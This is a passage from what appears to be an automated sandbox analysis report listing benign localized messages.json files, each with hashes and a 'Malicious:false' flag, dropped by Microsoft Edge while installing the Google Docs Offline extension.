                                                                                                                                                                                                                                                                                              SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                              SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                              SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):914
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                              MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                              SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                              SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                              SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):937
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                              MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                              SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                              SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                              SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1337
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                              MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                              SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                              SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                              SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2846
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                              MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                              SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                              SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                              SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):934
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                              MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                              SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                              SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                              SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):963
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                              MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                              SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                              SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                              SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1320
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                              MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                              SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                              SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                              SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):884
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                              MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                              SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                              SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                              SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):980
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                              MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                              SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                              SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                              SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1941
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                              MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                              SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                              SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                              SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1969
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                              MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                              SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                              SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                              SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1674
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                              MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                              SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                              SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                              SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1063
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                              MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                              SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                              SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                              SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1333
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
